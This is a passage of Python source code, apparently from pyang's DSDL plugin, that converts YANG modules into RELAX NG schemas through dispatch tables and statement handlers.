name pattern definitions as values.\n\n * `self.identity_deps: each item has an identity (statement) as\n the key and a list of identities derived from the key identity\n as the value.\n\n * `self.local_defs`: dictionary of local named pattern\n definitions. The keys are mangled names of the definitions.\n\n * `self.local_grammar`: the inner <grammar> element containing the\n mapping of a single YANG module.\n\n * `self.module`: the module being processed.\n\n * `self.module_prefixes`: maps module names to (disambiguated)\n prefixes.\n\n * `self.namespaces`: maps used namespace URIs to (disambiguated)\n prefixes.\n\n * `self.notifications`: root of the subtree containing\n notifications.\n\n * `self.prefix_stack`: stack of active module prefixes. A new\n prefix is pushed on the stack for an augment from an external\n module.\n\n * `self.rpcs`: root of the subtree containing RPC signatures.\n\n * `self.stmt_handler`: dictionary of methods that are dispatched\n for handling individual YANG statements. Its keys are YANG\n statement keywords.\n\n * `self.top_grammar`: the outer (root) <grammar> element.\n\n * `self.type_handler`: dictionary of methods that are dispatched\n for handling individual YANG types. Its keys are the names of\n YANG built-in types.\n\n * `self.tree`: outer <start> pattern.\n\n \"\"\"\n\n YANG_version = 1.1\n \"\"\"Checked against the yang-version statement, if present.\"\"\"\n\n dc_uri = \"http://purl.org/dc/terms\"\n \"\"\"Dublin Core URI\"\"\"\n a_uri = \"http://relaxng.org/ns/compatibility/annotations/1.0\"\n \"\"\"DTD compatibility annotations URI\"\"\"\n\n datatype_map = {\n \"int8\": \"byte\",\n \"int16\": \"short\",\n \"int32\": \"int\",\n \"int64\": \"long\",\n \"uint8\": \"unsignedByte\",\n \"uint16\": \"unsignedShort\",\n \"uint32\": \"unsignedInt\",\n \"uint64\": \"unsignedLong\",\n \"decimal64\": \"decimal\",\n \"binary\": \"base64Binary\",\n \"string\": \"string\",\n }\n \"\"\"Mapping of simple datatypes from YANG to W3C datatype library\"\"\"\n\n data_nodes = (\"leaf\", \"container\", \"leaf-list\", \"list\",\n \"anydata\", \"anyxml\", \"rpc\", \"notification\")\n \"\"\"Keywords of YANG data nodes.\"\"\"\n\n schema_nodes = data_nodes + (\"choice\", \"case\")\n \"\"\"Keywords of YANG schema nodes.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the dispatch dictionaries.\"\"\"\n self.stmt_handler = {\n \"action\": self.noop,\n \"anyxml\": self.anyxml_stmt,\n \"anydata\": self.anyxml_stmt,\n \"argument\": self.noop,\n \"augment\": self.noop,\n \"base\": self.noop,\n \"belongs-to\": self.noop,\n \"bit\": self.noop,\n \"case\": self.case_stmt,\n \"choice\": self.choice_stmt,\n \"config\": self.nma_attribute,\n \"contact\": self.noop,\n \"container\": self.container_stmt,\n \"default\": self.noop,\n \"deviation\": self.noop,\n \"deviate\": self.noop,\n \"description\": self.description_stmt,\n \"enum\" : self.enum_stmt,\n \"error-app-tag\": self.noop,\n \"error-message\": self.noop,\n \"extension\": self.noop,\n \"feature\": self.noop,\n \"fraction-digits\": self.noop,\n \"identity\": self.noop,\n \"if-feature\": self.noop,\n \"import\" : self.noop,\n \"include\" : self.include_stmt,\n \"input\": self.noop,\n \"grouping\" : self.noop,\n \"key\": self.noop,\n \"leaf\": self.leaf_stmt,\n \"leaf-list\": self.leaf_list_stmt,\n \"length\": self.noop,\n \"list\": self.list_stmt,\n \"mandatory\": self.noop,\n \"max-elements\": self.noop,\n \"min-elements\": self.noop,\n \"modifier\": self.noop,\n \"module\": self.noop,\n \"must\": self.must_stmt,\n \"namespace\": self.noop,\n \"notification\": self.notification_stmt,\n \"ordered-by\": self.nma_attribute,\n \"organization\": self.noop,\n \"output\": self.noop,\n \"path\": self.noop,\n \"pattern\": self.noop,\n \"position\": self.noop,\n \"prefix\": self.noop,\n \"presence\": self.noop,\n \"range\": self.noop,\n \"reference\": self.reference_stmt,\n \"refine\": self.noop,\n \"require-instance\": self.noop,\n \"revision\": self.noop,\n \"revision-date\": self.noop,\n \"rpc\": self.rpc_stmt,\n \"status\": self.nma_attribute,\n \"submodule\": self.noop,\n \"type\": self.type_stmt,\n \"typedef\" : self.noop,\n \"unique\" : self.unique_stmt,\n \"units\" : self.nma_attribute,\n \"uses\" : self.uses_stmt,\n \"value\": self.noop,\n \"when\" : self.when_stmt,\n \"yang-version\": self.yang_version_stmt,\n \"yin-element\": self.noop,\n }\n self.ext_handler = {\n \"ietf-yang-metadata\": {\n \"annotation\": self.noop\n }\n }\n self.type_handler = {\n \"boolean\": self.boolean_type,\n \"binary\": self.binary_type,\n \"bits\": self.bits_type,\n \"decimal64\": self.numeric_type,\n \"enumeration\": self.choice_type,\n \"empty\": self.noop,\n \"identityref\": self.identityref_type,\n \"instance-identifier\": self.instance_identifier_type,\n \"int8\": self.numeric_type,\n \"int16\": self.numeric_type,\n \"int32\": self.numeric_type,\n \"int64\": self.numeric_type,\n \"leafref\": self.leafref_type,\n \"string\" : self.string_type,\n \"uint8\": self.numeric_type,\n \"uint16\": self.numeric_type,\n \"uint32\": self.numeric_type,\n \"uint64\": self.numeric_type,\n \"union\": self.choice_type,\n }\n\n def serialize(self):\n \"\"\"Return the string representation of the receiver.\"\"\"\n res = '<?xml version=\"1.0\" encoding=\"UTF-8\"?>'\n for ns in self.namespaces:\n self.top_grammar.attr[\"xmlns:\" + self.namespaces[ns]] = ns\n res += self.top_grammar.start_tag()\n for ch in self.top_grammar.children:\n res += ch.serialize()\n res += self.tree.serialize()\n for d in self.global_defs:\n res += self.global_defs[d].serialize()\n for i in self.identities:\n res += self.identities[i].serialize()\n return res + self.top_grammar.end_tag()\n\n def from_modules(self, modules, no_dc=False, no_a=False,\n record_defs=False, lax_yang_version=False, debug=0):\n \"\"\"Return the instance representing mapped input modules.\"\"\"\n self.namespaces = {\n \"urn:ietf:params:xml:ns:netmod:dsdl-annotations:1\" : \"nma\",\n }\n if not no_dc:\n self.namespaces[self.dc_uri] = \"dc\"\n if not no_a:\n self.namespaces[self.a_uri] = \"a\"\n self.global_defs = {}\n self.all_defs = {}\n self.identity_deps = {}\n self.identities = {}\n self.debug = debug\n self.module_prefixes = {}\n gpset = {}\n self.gg_level = 0\n metadata = []\n self.has_meta = False\n for module in modules[0].i_ctx.modules.values():\n yver = module.search_one(\"yang-version\")\n if yver and float(yver.arg) > 1.0 and not lax_yang_version:\n raise error.EmitError(\n \"DSDL plugin supports only YANG version 1.\")\n if module.keyword == \"module\":\n for idn in module.i_identities.values():\n self.register_identity(idn)\n for module in modules:\n self.add_namespace(module)\n self.module = module\n annots = module.search((\"ietf-yang-metadata\", \"annotation\"))\n for ann in annots:\n aname = (self.module_prefixes[ann.main_module().arg] + \":\" +\n ann.arg)\n optel = SchemaNode(\"optional\")\n atel = SchemaNode(\"attribute\", optel).set_attr(\"name\", aname)\n self.handle_substmts(ann, atel)\n metadata.append(optel)\n if metadata:\n self.has_meta = True\n metel = SchemaNode.define(\"__yang_metadata__\")\n self.global_defs[\"__yang_metadata__\"] = metel\n for mattr in metadata:\n metel.subnode(mattr)\n for module in modules:\n self.module = module\n self.prefix_stack = [self.module_prefixes[module.arg]]\n for aug in module.search(\"augment\"):\n self.add_patch(gpset, aug)\n for sub in [ module.i_ctx.get_module(inc.arg)\n for inc in module.search(\"include\") ]:\n for aug in sub.search(\"augment\"):\n self.add_patch(gpset, aug)\n self.setup_top()\n for module in modules:\n self.module = module\n self.local_defs = {}\n if record_defs:\n self.preload_defs()\n self.prefix_stack = [self.module_prefixes[module.arg]]\n self.create_roots(module)\n self.lookup_expand(module, list(gpset))\n self.handle_substmts(module, self.data, gpset)\n for d in list(self.local_defs.values()):\n self.local_grammar.subnode(d)\n self.tree.subnode(self.local_grammar)\n self.all_defs.update(self.local_defs)\n self.all_defs.update(self.global_defs)\n self.dc_element(self.top_grammar, \"date\", time.strftime(\"%Y-%m-%d\"))\n return self\n\n def setup_top(self):\n \"\"\"Create top-level elements of the hybrid schema.\"\"\"\n self.top_grammar = SchemaNode(\"grammar\")\n self.top_grammar.attr = {\n \"xmlns\": \"http://relaxng.org/ns/structure/1.0\",\n \"datatypeLibrary\": \"http://www.w3.org/2001/XMLSchema-datatypes\"}\n self.tree = SchemaNode(\"start\")\n\n def create_roots(self, yam):\n \"\"\"Create the top-level structure for module `yam`.\"\"\"\n self.local_grammar = SchemaNode(\"grammar\")\n self.local_grammar.attr = {\n \"ns\": yam.search_one(\"namespace\").arg,\n \"nma:module\": self.module.arg}\n src_text = \"YANG module '%s'\" % yam.arg\n revs = yam.search(\"revision\")\n if len(revs) > 0:\n src_text += \" revision %s\" % self.current_revision(revs)\n self.dc_element(self.local_grammar, \"source\", src_text)\n start = SchemaNode(\"start\", self.local_grammar)\n self.data = SchemaNode(\"nma:data\", start, interleave=True)\n self.data.occur = 2\n self.rpcs = SchemaNode(\"nma:rpcs\", start, interleave=False)\n self.notifications = SchemaNode(\"nma:notifications\", start,\n interleave=False)\n\n def yang_to_xpath(self, xpe):\n \"\"\"Transform YANG's `xpath` to a form suitable for Schematron.\n\n 1. Prefixes are added to unprefixed local names. Inside global\n groupings, the prefix is represented as the variable\n '$pref' which is substituted via Schematron abstract\n patterns.\n 2. '$root' is prepended to every absolute location path.\n \"\"\"\n if self.gg_level:\n pref = \"$pref:\"\n else:\n pref = self.prefix_stack[-1] + \":\"\n toks = xpath_lexer.scan(xpe)\n prev = None\n res = \"\"\n for tok in toks:\n if (tok.type == \"SLASH\" and\n prev not in (\"DOT\", \"DOTDOT\", \"RPAREN\", \"RBRACKET\", \"name\",\n \"wildcard\", \"prefix_test\")):\n res += \"$root\"\n elif tok.type == \"name\" and \":\" not in tok.value:\n res += pref\n res += tok.value\n if tok.type != \"_whitespace\":\n prev = tok.type\n return res\n\n def add_namespace(self, module):\n \"\"\"Add item uri:prefix for `module` to `self.namespaces`.\n\n The prefix to be actually used for `uri` is returned. If the\n namespace is already present, the old prefix is used. Prefix\n clashes are resolved by disambiguating `prefix`.\n \"\"\"\n uri = module.search_one(\"namespace\").arg\n prefix = module.search_one(\"prefix\").arg\n if uri in self.namespaces:\n return self.namespaces[uri]\n end = 1\n new = prefix\n while new in list(self.namespaces.values()):\n new = \"%s%x\" % (prefix,end)\n end += 1\n self.namespaces[uri] = new\n self.module_prefixes[module.arg] = new\n for inc in module.search(\"include\"):\n self.module_prefixes[inc.arg] = new\n return new\n\n def register_identity(self, id_stmt):\n \"\"\"Register `id_stmt` with its base identity, if any.\n \"\"\"\n bst = id_stmt.search_one(\"base\")\n if bst:\n bder = self.identity_deps.setdefault(bst.i_identity, [])\n bder.append(id_stmt)\n\n def add_derived_identity(self, id_stmt):\n \"\"\"Add pattern def for `id_stmt` and all derived identities.\n\n The corresponding \"ref\" pattern is returned.\n \"\"\"\n p = self.add_namespace(id_stmt.main_module())\n if id_stmt not in self.identities: # add named pattern def\n self.identities[id_stmt] = SchemaNode.define(\"__%s_%s\" %\n (p, id_stmt.arg))\n parent = self.identities[id_stmt]\n if id_stmt in self.identity_deps:\n parent = SchemaNode.choice(parent, occur=2)\n for i in self.identity_deps[id_stmt]:\n parent.subnode(self.add_derived_identity(i))\n idval = SchemaNode(\"value\", parent, p+\":\"+id_stmt.arg)\n idval.attr[\"type\"] = \"QName\"\n res = SchemaNode(\"ref\")\n res.attr[\"name\"] = self.identities[id_stmt].attr[\"name\"]\n return res\n\n def preload_defs(self):\n \"\"\"Preload all top-level definitions.\"\"\"\n for d in (self.module.search(\"grouping\") +\n self.module.search(\"typedef\")):\n uname, dic = self.unique_def_name(d)\n self.install_def(uname, d, dic)\n\n def add_prefix(self, name, stmt):\n \"\"\"Return `name` prepended with correct prefix.\n\n If the name is already prefixed, the prefix may be translated\n to the value obtained from `self.module_prefixes`. Unmodified\n `name` is returned if we are inside a global grouping.\n \"\"\"\n if self.gg_level:\n return name\n pref, colon, local = name.partition(\":\")\n if colon:\n return (self.module_prefixes[stmt.i_module.i_prefixes[pref][0]]\n + \":\" + local)\n else:\n return self.prefix_stack[-1] + \":\" + pref\n\n def qname(self, stmt):\n \"\"\"Return (prefixed) node name of `stmt`.\n\n The result is prefixed with the local prefix unless we are\n inside a global grouping.\n \"\"\"\n if self.gg_level:\n return stmt.arg\n return self.prefix_stack[-1] + \":\" + stmt.arg\n\n def dc_element(self, parent, name, text):\n \"\"\"Add DC element `name` containing `text` to `parent`.\"\"\"\n if self.dc_uri in self.namespaces:\n dcel = SchemaNode(self.namespaces[self.dc_uri] + \":\" + name,\n text=text)\n parent.children.insert(0,dcel)\n\n def get_default(self, stmt, refd):\n \"\"\"Return default value for `stmt` node.\n\n `refd` is a dictionary of applicable refinements that is\n constructed in the `process_patches` method.\n \"\"\"\n if refd[\"default\"]:\n return refd[\"default\"]\n defst = stmt.search_one(\"default\")\n if defst:\n return defst.arg\n return None\n\n def unique_def_name(self, stmt, inrpc=False):\n \"\"\"Mangle the name of `stmt` (typedef or grouping).\n\n Return the mangled name and dictionary where the definition is\n to be installed. The `inrpc` flag indicates when we are inside\n an RPC, in which case the name gets the \"__rpc\" suffix.\n \"\"\"\n module = stmt.main_module()\n name = \"\"\n while True:\n pref = stmt.arg if stmt.arg else stmt.keyword\n name = \"__\" + pref + name\n if stmt.keyword == \"grouping\":\n name = \"_\" + name\n if stmt.parent.parent is None:\n break\n stmt = stmt.parent\n defs = (self.global_defs\n if stmt.keyword in (\"grouping\", \"typedef\")\n else self.local_defs)\n if inrpc:\n name += \"__rpc\"\n return (module.arg + name, defs)\n\n def add_patch(self, pset, augref):\n \"\"\"Add patch corresponding to `augref` to `pset`.\n\n `augref` must be either 'augment' or 'refine' statement.\n \"\"\"\n try:\n path = [ self.add_prefix(c, augref)\n for c in augref.arg.split(\"/\") if c ]\n except KeyError:\n # augment of a module that's not among input modules\n return\n car = path[0]\n patch = Patch(path[1:], augref)\n if car in pset:\n sel = [ x for x in pset[car] if patch.path == x.path ]\n if sel:\n sel[0].combine(patch)\n else:\n pset[car].append(patch)\n else:\n pset[car] = [patch]\n\n def apply_augments(self, auglist, p_elem, pset):\n \"\"\"Handle substatements of augments from `auglist`.\n\n The augments are applied in the context of `p_elem`. `pset`\n is a patch set containing patches that may be applicable to\n descendants.\n \"\"\"\n for a in auglist:\n par = a.parent\n if a.search_one(\"when\") is None:\n wel = p_elem\n else:\n if p_elem.interleave:\n kw = \"interleave\"\n else:\n kw = \"group\"\n wel = SchemaNode(kw, p_elem, interleave=p_elem.interleave)\n wel.occur = p_elem.occur\n if par.keyword == \"uses\":\n self.handle_substmts(a, wel, pset)\n continue\n if par.keyword == \"submodule\":\n mnam = par.i_including_modulename\n else:\n mnam = par.arg\n if self.prefix_stack[-1] == self.module_prefixes[mnam]:\n self.handle_substmts(a, wel, pset)\n else:\n self.prefix_stack.append(self.module_prefixes[mnam])\n self.handle_substmts(a, wel, pset)\n self.prefix_stack.pop()\n\n def current_revision(self, r_stmts):\n \"\"\"Pick the most recent revision date.\n\n `r_stmts` is a list of 'revision' statements.\n \"\"\"\n cur = max([[int(p) for p in r.arg.split(\"-\")] for r in r_stmts])\n return \"%4d-%02d-%02d\" % tuple(cur)\n\n def insert_doc(self, p_elem, docstring):\n \"\"\"Add <a:documentation> with `docstring` to `p_elem`.\"\"\"\n dtag = self.namespaces[self.a_uri] + \":documentation\"\n elem = SchemaNode(dtag, text=docstring)\n p_elem.annots.append(elem)\n\n def install_def(self, name, dstmt, def_map, interleave=False):\n \"\"\"Install definition `name` into the appropriate dictionary.\n\n `dstmt` is the definition statement ('typedef' or 'grouping')\n that is to be mapped to a RELAX NG named pattern '<define\n name=\"`name`\">'. `def_map` must be either `self.local_defs` or\n `self.global_defs`. `interleave` determines the interleave\n status inside the definition.\n \"\"\"\n delem = SchemaNode.define(name, interleave=interleave)\n delem.attr[\"name\"] = name\n def_map[name] = delem\n if def_map is self.global_defs:\n self.gg_level += 1\n self.handle_substmts(dstmt, delem)\n if def_map is self.global_defs:\n self.gg_level -= 1\n\n def rng_annotation(self, stmt, p_elem):\n \"\"\"Append YIN representation of extension statement `stmt`.\"\"\"\n ext = stmt.i_extension\n prf, extkw = stmt.raw_keyword\n (modname,rev)=stmt.i_module.i_prefixes[prf]\n prefix = self.add_namespace(\n statements.modulename_to_module(self.module,modname,rev))\n eel = SchemaNode(prefix + \":\" + extkw, p_elem)\n argst = ext.search_one(\"argument\")\n if argst:\n if argst.search_one(\"yin-element\", \"true\"):\n SchemaNode(prefix + \":\" + argst.arg, eel, stmt.arg)\n else:\n eel.attr[argst.arg] = stmt.arg\n self.handle_substmts(stmt, eel)\n\n def propagate_occur(self, node, value):\n \"\"\"Propagate occurence `value` to `node` and its ancestors.\n\n Occurence values are defined and explained in the SchemaNode\n class.\n \"\"\"\n while node.occur < value:\n node.occur = value\n if node.name == \"define\":\n break\n node = node.parent\n\n def process_patches(self, pset, stmt, elem, altname=None):\n \"\"\"Process patches for data node `name` from `pset`.\n\n `stmt` provides the context in YANG and `elem` is the parent\n element in the output schema. Refinements adding documentation\n and changing the config status are immediately applied.\n\n The returned tuple consists of:\n - a dictionary of refinements, in which keys are the keywords\n of the refinement statements and values are the new values\n of refined parameters.\n - a list of 'augment' statements that are to be applied\n directly under `elem`.\n - a new patch set containing patches applicable to\n substatements of `stmt`.\n \"\"\"\n if altname:\n name = altname\n else:\n name = stmt.arg\n new_pset = {}\n augments = []\n refine_dict = dict.fromkeys((\"presence\", \"default\", \"mandatory\",\n \"min-elements\", \"max-elements\"))\n if not isinstance(pset, dict):\n raise ValueError('pset is of type %s' % type(pset).__name__)\n for p in pset.pop(self.add_prefix(name, stmt), []):\n if p.path:\n head = p.pop()\n if head in new_pset:\n new_pset[head].append(p)\n else:\n new_pset[head] = [p]\n else:\n for refaug in p.plist:\n if refaug.keyword == \"augment\":\n augments.append(refaug)\n else:\n for s in refaug.substmts:\n if s.keyword == \"description\":\n self.description_stmt(s, elem, None)\n elif s.keyword == \"reference\":\n self.reference_stmt(s, elem, None)\n elif s.keyword == \"must\":\n self.must_stmt(s, elem, None)\n elif s.keyword == \"config\":\n self.nma_attribute(s, elem)\n elif refine_dict.get(s.keyword, False) is None:\n refine_dict[s.keyword] = s.arg\n return (refine_dict, augments, new_pset)\n\n def get_minmax(self, stmt, refine_dict):\n \"\"\"Return pair of (min,max)-elements values for `stmt`.\n\n `stmt` must be a 'list' or 'leaf-list'. Applicable refinements\n from `refine_dict` are also taken into account.\n \"\"\"\n minel = refine_dict[\"min-elements\"]\n maxel = refine_dict[\"max-elements\"]\n if minel is None:\n minst = stmt.search_one(\"min-elements\")\n if minst:\n minel = minst.arg\n else:\n minel = \"0\"\n if maxel is None:\n maxst = stmt.search_one(\"max-elements\")\n if maxst:\n maxel = maxst.arg\n if maxel == \"unbounded\":\n maxel = None\n return (minel, maxel)\n\n def lookup_expand(self, stmt, names):\n \"\"\"Find schema nodes under `stmt`, also in used groupings.\n\n `names` is a list with qualified names of the schema nodes to\n look up. All 'uses'/'grouping' pairs between `stmt` and found\n schema nodes are marked for expansion.\n \"\"\"\n if not names:\n return []\n todo = [stmt]\n while todo:\n pst = todo.pop()\n for sub in pst.substmts:\n if sub.keyword in self.schema_nodes:\n qname = self.qname(sub)\n if qname in names:\n names.remove(qname)\n par = sub.parent\n while hasattr(par,\"d_ref\"): # par must be grouping\n par.d_ref.d_expand = True\n par = par.d_ref.parent\n if not names:\n return [] # all found\n elif sub.keyword == \"uses\":\n g = sub.i_grouping\n g.d_ref = sub\n todo.append(g)\n return names\n\n def type_with_ranges(self, tchain, p_elem, rangekw, gen_data):\n \"\"\"Handle types with 'range' or 'length' restrictions.\n\n `tchain` is the chain of type definitions from which the\n ranges may need to be extracted. `rangekw` is the statement\n keyword determining the range type (either 'range' or\n 'length'). `gen_data` is a function that generates the\n output schema node (a RELAX NG <data> pattern).\n \"\"\"\n ranges = self.get_ranges(tchain, rangekw)\n if not ranges:\n return p_elem.subnode(gen_data())\n if len(ranges) > 1:\n p_elem = SchemaNode.choice(p_elem)\n p_elem.occur = 2\n for r in ranges:\n d_elem = gen_data()\n for p in self.range_params(r, rangekw):\n d_elem.subnode(p)\n p_elem.subnode(d_elem)\n\n def get_ranges(self, tchain, kw):\n \"\"\"Return list of ranges defined in `tchain`.\n\n `kw` is the statement keyword determining the type of the\n range, i.e. 'range' or 'length'. `tchain` is the chain of type\n definitions from which the resulting range is obtained.\n\n The returned value is a list of tuples containing the segments\n of the resulting range.\n \"\"\"\n (lo, hi) = (\"min\", \"max\")\n ran = None\n for t in tchain:\n rstmt = t.search_one(kw)\n if rstmt is None:\n continue\n parts = [ p.strip() for p in rstmt.arg.split(\"|\") ]\n ran = [ [ i.strip() for i in p.split(\"..\") ] for p in parts ]\n if ran[0][0] != 'min':\n lo = ran[0][0]\n if ran[-1][-1] != 'max':\n hi = ran[-1][-1]\n if ran is None:\n return None\n if len(ran) == 1:\n return [(lo, hi)]\n else:\n return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]\n\n def range_params(self, ran, kw):\n \"\"\"Return list of <param>s corresponding to range `ran`.\n\n `kw` is the statement keyword determining the type of the\n range, i.e. 'range' or 'length'. `ran` is the internal\n representation of a range as constructed by the `get_ranges`\n method.\n \"\"\"\n if kw == \"length\":\n if ran[0][0] != \"m\" and (len(ran) == 1 or ran[0] == ran[1]):\n elem = SchemaNode(\"param\").set_attr(\"name\",\"length\")\n elem.text = ran[0]\n return [elem]\n min_ = SchemaNode(\"param\").set_attr(\"name\",\"minLength\")\n max_ = SchemaNode(\"param\").set_attr(\"name\",\"maxLength\")\n else:\n if len(ran) == 1:\n ran *= 2 # duplicating the value\n min_ = SchemaNode(\"param\").set_attr(\"name\",\"minInclusive\")\n max_ = SchemaNode(\"param\").set_attr(\"name\",\"maxInclusive\")\n res = []\n if ran[0][0] != \"m\":\n elem = min_\n elem.text = ran[0]\n res.append(elem)\n if ran[1][0] != \"m\":\n elem = max_\n elem.text = ran[1]\n res.append(elem)\n return res\n\n def handle_stmt(self, stmt, p_elem, pset=None):\n \"\"\"\n Run handler method for statement `stmt`.\n\n `p_elem` is the parent node in the output schema. `pset` is\n the current \"patch set\" - a dictionary with keys being QNames\n of schema nodes at the current level of hierarchy for which\n (or descendants thereof) any pending patches exist. The values\n are instances of the Patch class.\n\n All handler methods are defined below and must have the same\n arguments as this method. They should create the output schema\n fragment corresponding to `stmt`, apply all patches from\n `pset` belonging to `stmt`, insert the fragment under `p_elem`\n and perform all side effects as necessary.\n \"\"\"\n if self.debug > 0:\n sys.stderr.write(\"Handling '%s %s'\\n\" %\n (util.keyword_to_str(stmt.raw_keyword), stmt.arg))\n try:\n method = self.stmt_handler[stmt.keyword]\n except KeyError:\n if isinstance(stmt.keyword, tuple):\n try:\n method = self.ext_handler[stmt.keyword[0]][stmt.keyword[1]]\n except KeyError:\n method = self.rng_annotation\n method(stmt, p_elem)\n return\n else:\n raise error.EmitError(\n \"Unknown keyword %s - this should not happen.\\n\"\n % stmt.keyword)\n if pset is None:\n pset = {}\n method(stmt, p_elem, pset)\n\n def handle_substmts(self, stmt, p_elem, pset=None):\n \"\"\"Handle all substatements of `stmt`.\"\"\"\n if pset is None:\n pset = {}\n for sub in stmt.substmts:\n self.handle_stmt(sub, p_elem, pset)\n\n # Handlers for YANG statements\n\n def noop(self, stmt, p_elem, pset=None):\n \"\"\"`stmt` is not handled in the regular way.\"\"\"\n pass\n\n def anyxml_stmt(self, stmt, p_elem, pset):\n elem = SchemaNode.element(self.qname(stmt), p_elem)\n if self.has_meta:\n elem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n SchemaNode(\"parentRef\", elem).set_attr(\"name\", \"__anyxml__\")\n refd, _, _ = self.process_patches(pset, stmt, elem)\n if p_elem.name == \"choice\":\n elem.occur = 3\n elif refd[\"mandatory\"] or stmt.search_one(\"mandatory\", \"true\"):\n elem.occur = 2\n self.propagate_occur(p_elem, 2)\n self.handle_substmts(stmt, elem)\n\n def nma_attribute(self, stmt, p_elem, pset=None):\n \"\"\"Map `stmt` to a NETMOD-specific attribute.\n\n The name of the attribute is the same as the 'keyword' of\n `stmt`.\n \"\"\"\n att = \"nma:\" + stmt.keyword\n if att not in p_elem.attr:\n p_elem.attr[att] = stmt.arg\n\n def case_stmt(self, stmt, p_elem, pset):\n celem = SchemaNode.case(p_elem)\n if p_elem.default_case != stmt.arg:\n celem.occur = 3\n refd, augs, new_pset = self.process_patches(pset, stmt, celem)\n left = self.lookup_expand(stmt, list(new_pset))\n for a in augs:\n left = self.lookup_expand(a, left)\n self.handle_substmts(stmt, celem, new_pset)\n self.apply_augments(augs, celem, new_pset)\n\n def choice_stmt(self, stmt, p_elem, pset):\n chelem = SchemaNode.choice(p_elem)\n chelem.attr[\"nma:name\"] = stmt.arg\n refd, augs, new_pset = self.process_patches(pset, stmt, chelem)\n left = self.lookup_expand(stmt, list(new_pset))\n for a in augs:\n left = self.lookup_expand(a, left)\n if refd[\"mandatory\"] or stmt.search_one(\"mandatory\", \"true\"):\n chelem.attr[\"nma:mandatory\"] = \"true\"\n self.propagate_occur(chelem, 2)\n else:\n defv = self.get_default(stmt, refd)\n if defv is not None:\n chelem.default_case = defv\n else:\n chelem.occur = 3\n self.handle_substmts(stmt, chelem, new_pset)\n self.apply_augments(augs, chelem, new_pset)\n\n def container_stmt(self, stmt, p_elem, pset):\n celem = SchemaNode.element(self.qname(stmt), p_elem)\n if self.has_meta:\n celem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n refd, augs, new_pset = self.process_patches(pset, stmt, celem)\n left = self.lookup_expand(stmt, list(new_pset))\n for a in augs:\n left = self.lookup_expand(a, left)\n if (p_elem.name == \"choice\" and p_elem.default_case != stmt.arg\n or p_elem.name == \"case\" and\n p_elem.parent.default_case != stmt.parent.arg and\n len(stmt.parent.i_children) < 2 or\n refd[\"presence\"] or stmt.search_one(\"presence\")):\n celem.occur = 3\n self.handle_substmts(stmt, celem, new_pset)\n self.apply_augments(augs, celem, new_pset)\n\n def description_stmt(self, stmt, p_elem, pset):\n # ignore imported and top-level descriptions + desc. of enum\n if (self.a_uri in self.namespaces and\n stmt.i_module == self.module != stmt.parent and\n stmt.parent.keyword != \"enum\"):\n self.insert_doc(p_elem, stmt.arg)\n\n def enum_stmt(self, stmt, p_elem, pset):\n elem = SchemaNode(\"value\", p_elem, stmt.arg)\n for sub in stmt.search(\"status\"):\n self.handle_stmt(sub, elem)\n\n def include_stmt(self, stmt, p_elem, pset):\n if stmt.parent.keyword == \"module\":\n subm = self.module.i_ctx.get_module(stmt.arg)\n self.handle_substmts(subm, p_elem, pset)\n\n def leaf_stmt(self, stmt, p_elem, pset):\n qname = self.qname(stmt)\n elem = SchemaNode.element(qname)\n if self.has_meta:\n elem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n if p_elem.name == \"_list_\" and qname in p_elem.keys:\n p_elem.keymap[qname] = elem\n elem.occur = 2\n else:\n p_elem.subnode(elem)\n refd, _, _ = self.process_patches(pset, stmt, elem)\n if (p_elem.name == \"choice\" and p_elem.default_case != stmt.arg or\n p_elem.name == \"case\" and\n p_elem.parent.default_case != stmt.parent.arg and\n len(stmt.parent.i_children) < 2):\n\n elem.occur = 3\n elif refd[\"mandatory\"] or stmt.search_one(\"mandatory\", \"true\"):\n self.propagate_occur(elem, 2)\n if elem.occur == 0:\n defv = self.get_default(stmt, refd)\n if defv is not None:\n elem.default = defv\n self.propagate_occur(elem, 1)\n self.handle_substmts(stmt, elem)\n\n def leaf_list_stmt(self, stmt, p_elem, pset):\n lelem = SchemaNode.leaf_list(self.qname(stmt), p_elem)\n lelem.attr[\"nma:leaf-list\"] = \"true\"\n if self.has_meta:\n lelem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n refd, _, _ = self.process_patches(pset, stmt, lelem)\n lelem.minEl, lelem.maxEl = self.get_minmax(stmt, refd)\n if int(lelem.minEl) > 0:\n self.propagate_occur(p_elem, 2)\n self.handle_substmts(stmt, lelem)\n\n def list_stmt(self, stmt, p_elem, pset):\n lelem = SchemaNode.list(self.qname(stmt), p_elem)\n if self.has_meta:\n lelem.annot(\n SchemaNode(\"ref\").set_attr(\"name\", \"__yang_metadata__\"))\n keyst = stmt.search_one(\"key\")\n if keyst:\n lelem.keys = [self.add_prefix(k, stmt) for k in keyst.arg.split()]\n refd, augs, new_pset = self.process_patches(pset, stmt, lelem)\n left = self.lookup_expand(stmt, list(new_pset) + lelem.keys)\n for a in augs:\n left = self.lookup_expand(a, left)\n lelem.minEl, lelem.maxEl = self.get_minmax(stmt, refd)\n if int(lelem.minEl) > 0:\n self.propagate_occur(p_elem, 2)\n self.handle_substmts(stmt, lelem, new_pset)\n self.apply_augments(augs, lelem, new_pset)\n\n def must_stmt(self, stmt, p_elem, pset):\n mel = SchemaNode(\"nma:must\")\n p_elem.annot(mel)\n mel.attr[\"assert\"] = self.yang_to_xpath(stmt.arg)\n em = stmt.search_one(\"error-message\")\n if em:\n SchemaNode(\"nma:error-message\", mel, em.arg)\n eat = stmt.search_one(\"error-app-tag\")\n if eat:\n SchemaNode(\"nma:error-app-tag\", mel, eat.arg)\n\n def notification_stmt(self, stmt, p_elem, pset):\n notel = SchemaNode(\"nma:notification\", self.notifications)\n notel.occur = 2\n elem = SchemaNode.element(self.qname(stmt), notel,\n interleave=True, occur=2)\n _, augs, new_pset = self.process_patches(pset, stmt, elem)\n self.handle_substmts(stmt, elem, new_pset)\n self.apply_augments(augs, elem, new_pset)\n\n def reference_stmt(self, stmt, p_elem, pset):\n # ignore imported and top-level descriptions + desc. of enum\n if (self.a_uri in self.namespaces and\n stmt.i_module == self.module != stmt.parent and\n stmt.parent.keyword != \"enum\"):\n self.insert_doc(p_elem, \"See: \" + stmt.arg)\n\n def rpc_stmt(self, stmt, p_elem, pset):\n 